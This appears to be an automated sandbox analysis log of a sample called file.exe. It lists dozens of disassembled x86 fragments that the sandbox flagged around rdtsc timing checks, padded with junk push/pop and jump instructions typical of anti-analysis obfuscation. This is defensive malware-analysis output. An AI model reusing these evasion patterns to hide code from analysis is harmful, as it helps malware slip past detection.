                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 277603 second address: 277649 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F05ECFAD306h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F05ECFAD316h 0x00000014 ja 00007F05ECFAD306h 0x0000001a popad 0x0000001b pop esi 0x0000001c pushad 0x0000001d jmp 00007F05ECFAD313h 0x00000022 pushad 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 277649 second address: 277676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F05ECE231B6h 0x0000000a popad 0x0000000b jg 00007F05ECE231B8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F05ECE231C6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 277676 second address: 27767A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C01C second address: 27C022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C022 second address: 27C036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F05ECFAD30Dh 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C036 second address: 27C053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C053 second address: 27C057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C057 second address: 27C065 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C065 second address: 27C06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C06D second address: 27C075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C1E0 second address: 27C1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C4B9 second address: 27C4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05ECE231C8h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C4D5 second address: 27C4DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C626 second address: 27C63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007F05ECE231B6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jg 00007F05ECE231BEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C958 second address: 27C96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F05ECFAD306h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C96C second address: 27C972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A283 second address: 22A2B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD318h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F05ECFAD313h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A2B2 second address: 22A2C0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A2C0 second address: 22A2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 22A2C6 second address: 22A2CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27D01A second address: 27D027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27D027 second address: 27D02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27D02B second address: 27D043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F05ECFAD306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F05ECFAD30Ch 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B947 second address: 27B951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B951 second address: 27B979 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F05ECFAD312h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jne 00007F05ECFAD306h 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B979 second address: 27B987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 280272 second address: 28027E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jns 00007F05ECFAD306h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28027E second address: 28028E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FE9CD second address: 1FE9D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FE9D1 second address: 1FE9F2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F05ECE231B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F05ECE231BAh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F05ECE231BAh 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FE9F2 second address: 1FEA17 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F05ECFAD30Fh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05ECFAD30Eh 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FEA17 second address: 1FEA1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24E883 second address: 24E889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24E889 second address: 24E893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F05ECE231B6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24E893 second address: 24E8A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jbe 00007F05ECFAD30Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24ED97 second address: 24ED9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24EF2A second address: 24EF36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24EF36 second address: 24EF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F05ECE231B6h 0x0000000a popad 0x0000000b je 00007F05ECE231BCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24EFD6 second address: 24EFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F09A second address: 24F0BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F0BC second address: 24F0EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c jmp 00007F05ECFAD315h 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F05ECFAD30Ch 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F17B second address: 24F17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F2E4 second address: 24F2EE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F05ECFAD30Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F2EE second address: 24F35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F05ECE231BEh 0x0000000c nop 0x0000000d jmp 00007F05ECE231C3h 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F05ECE231B8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 jmp 00007F05ECE231C4h 0x00000037 jbe 00007F05ECE231B6h 0x0000003d popad 0x0000003e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F35A second address: 24F360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24F360 second address: 24F364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24FAA4 second address: 24FAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24FB1D second address: 24FBBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f adc ecx, 5BC3BA4Bh 0x00000015 lea eax, dword ptr [ebp+124933F3h] 0x0000001b pushad 0x0000001c mov dword ptr [ebp+12456BECh], ecx 0x00000022 mov edx, dword ptr [ebp+122D280Dh] 0x00000028 popad 0x00000029 sub ecx, dword ptr [ebp+122D3775h] 0x0000002f push eax 0x00000030 jmp 00007F05ECE231C6h 0x00000035 mov dword ptr [esp], eax 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F05ECE231B8h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov edi, 08CDF534h 0x00000057 lea eax, dword ptr [ebp+124933AFh] 0x0000005d mov edx, 79B19866h 0x00000062 jne 00007F05ECE231CEh 0x00000068 push eax 0x00000069 push esi 0x0000006a push eax 0x0000006b push edx 0x0000006c jno 00007F05ECE231B6h 0x00000072 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24FBBA second address: 22A283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007F05ECFAD30Fh 0x0000000f mov di, 8D87h 0x00000013 pop edi 0x00000014 call dword ptr [ebp+122D3191h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F05ECFAD319h 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28481E second address: 284822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 284F5F second address: 284F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2850EB second address: 285110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F05ECE231B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F05ECE231C5h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 285110 second address: 285116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 285116 second address: 285140 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F05ECE231B6h 0x00000008 jnc 00007F05ECE231B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push esi 0x00000013 jl 00007F05ECE231B6h 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c js 00007F05ECE231C2h 0x00000022 jg 00007F05ECE231B6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 285140 second address: 285152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F05ECFAD30Ah 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AE90 second address: 28AEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05ECE231C3h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AEA7 second address: 28AEAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 289E96 second address: 289EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C5h 0x00000007 jns 00007F05ECE231B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 289EB8 second address: 289EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 289EBE second address: 289EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F05ECE231BCh 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F05ECE231C1h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 jp 00007F05ECE231B6h 0x0000001d jmp 00007F05ECE231BDh 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 289EFE second address: 289F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F05ECFAD308h 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28A1DE second address: 28A1FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F05ECE231C0h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F05ECE231BBh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28A1FF second address: 28A203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AC13 second address: 28AC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 292553 second address: 29258C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F05ECFAD317h 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F05ECFAD310h 0x00000010 jmp 00007F05ECFAD30Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 295191 second address: 295196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 295196 second address: 29519C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29CECD second address: 29CEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29CEDC second address: 29CEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29B79A second address: 29B7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F05ECE231BCh 0x0000000d jo 00007F05ECE231B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BCEC second address: 29BCF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BCF0 second address: 29BCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BCF9 second address: 29BD00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BE28 second address: 29BE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BE34 second address: 29BE3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BE3D second address: 29BE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BF99 second address: 29BFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F05ECFAD306h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BFA3 second address: 29BFA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29BFA9 second address: 29BFC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECFAD319h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A466A second address: 2A4670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A481B second address: 2A4853 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F05ECFAD31Bh 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F05ECFAD306h 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4853 second address: 2A485D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F05ECE231B6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A485D second address: 2A4867 instructions: 0x00000000 rdtsc 0x00000002 js 00007F05ECFAD306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4F73 second address: 2A4F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231BBh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4F82 second address: 2A4F86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AB759 second address: 2AB75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC00D second address: 2AC023 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F05ECFAD306h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F05ECFAD30Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC354 second address: 2AC372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F05ECE231C5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AC372 second address: 2AC381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F05ECFAD306h 0x0000000f rdtsc
